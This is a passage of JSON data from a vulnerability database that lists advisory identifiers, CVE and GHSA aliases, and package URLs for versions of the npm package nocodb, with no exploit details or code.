c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28361","GHSA-p9x3-w98f-7j3q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z9nq-zv94-syhg"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.10.1"}